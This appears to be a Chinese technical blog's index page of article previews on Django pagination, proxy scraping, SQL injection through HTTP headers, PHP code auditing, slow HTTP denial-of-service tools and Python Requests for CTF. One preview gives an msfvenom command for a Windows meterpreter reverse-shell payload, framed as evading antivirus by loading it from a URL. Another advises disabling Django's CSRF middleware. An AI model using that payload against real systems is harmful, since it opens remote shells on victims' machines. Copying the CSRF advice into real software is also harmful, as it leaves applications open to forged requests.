Django 前端BootCSS 实现分页
通过使用bootstrap框架,并配合django自带的paginator分页组件即可实现简单的分页效果。1.创建myweb项目python manage.py startapp myweb2.修改settings.py配置文件,导入我们的app的名字,去掉csrf这个选项# 屏蔽一项 middleware = [ #'django.middleware.csrf.csrfviewmiddleware' ] # ...
Python 多线程爬取西刺代理
西刺代理是一个国内ip代理,由于代理倒闭了,所以我就把原来的代码放出来供大家学习吧。首先找到所有的tr标签,与class="odd"的标签,然后提取出来。然后再依次找到tr标签里面的所有td标签,然后只提取出里面的[1,2,5,9]这四个标签的位置,其他的不提取。最后可以写出提取单一页面的代码,提取后将...
2023-03-09 HTTP
HTTP请求头引发的注入问题 (SQL注入)
关于请求头中注入问题的演示,这里我写了一些测试案例,用来测试请求头中存在的问题。我们常见的会发生注入的点有 referer、x-forwarded-for、cookie、x-real-ip、accept-language、authorization,user-agent http referer:是header的一部分,当浏览器请求网页时,会自动携带一个请求来源,如果后...
2023-03-09 HTTP网络安全数据库SQLTCP/IP
通过URL载入ShellCode代码
将生成的shellcode放到web服务器上,本地不保存恶意代码,本地只负责加载到内存运行,这样可以很好的躲过查杀。生成shellcodemsfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp \ -b '\x00\x0b' lhost=192.168.1.20 lport=9999 -f c2.使用获取代码,前提搭建好http...
PHP 安全编码总结笔记
sql注入: 代码中的 http_x_forwarded_for 地址可以被伪造,而remote_addr则相对更安全,有些应用程序会将对方ip地址带入数据库查询是否存在,例如同一个ip每天只能注册一个账号等,如果目标代码中使用的是 http_x_forwarded_for 获取的ip地址,那么攻击者就可以通过修改http包头实现sql注入攻击。sq...
2023-03-09 HTTP网络安全数据库SQLTCP/IP
PHP SQL 注入代码审计
代码审计(code audit)是一种以发现程序错误,安全漏洞和违反程序规范为目标的源代码分析。软件代码审计是对编程项目中源代码的全面分析,旨在发现错误,安全漏洞或违反编程约定。接下来你需要准备好lamp环境,这里使用的是 centos 7.5 + apache/2.4.6 + php 7.0 + mariadb 5.5 然后导入以下数据库...
Python Requests 实现简单网络请求
python 是一种跨平台的计算机程序设计语言,面向对象动态类型语言,python是纯粹的自由软件,源代码和解释器cpython遵循 gpl(gnu general public license)协议,随着版本的不断更新和语言新功能的添加,python 越来越多被用于独立的、大型项目的开发。快速抓取网页: 使用urllib最基本的抓取功能,将百...
slowhttptest 慢速攻击工具入门
slowhttptest 攻击是一款慢速攻击工具,其擅长攻击apache/tomcat这里应用层服务,通常情况下,http协议在接收到完整的客户端请求数据包时才会开始处理本次请求,但如果攻击者通过修改数据包中的window窗口大小,实现慢速发送数据包,那么服务器就会始终为其保留连接池资源占用,此类大量的并发请求将...
面向设计师、开发者的开源免费图标库
1. iconfonthttps://www.iconfont.cn国内功能很强大且图标内容很丰富的矢量图标库,提供矢量图标下载、在线存储、格式转换等功能。阿里巴巴体验团队倾力打造,设计和前端开发的便捷工具前端 ui 框架 layui 的内置图标就是取材于阿里巴巴矢量图标库,当内置的图标不够使用时,可以在阿里巴巴矢量图标...
Python模块-Requests学习与CTF和AWD实战
requests is the only non-gmo http library for python, safe for human consumption. 前言为什么学习requests模块呢,因为最近老是遇见它,自己又不太懂,加之在很多web的poc里面requests模块的出镜率很高,于是特此学习记录之。简介requests是一个简单方便的http 库。比python标准库中的urllib2...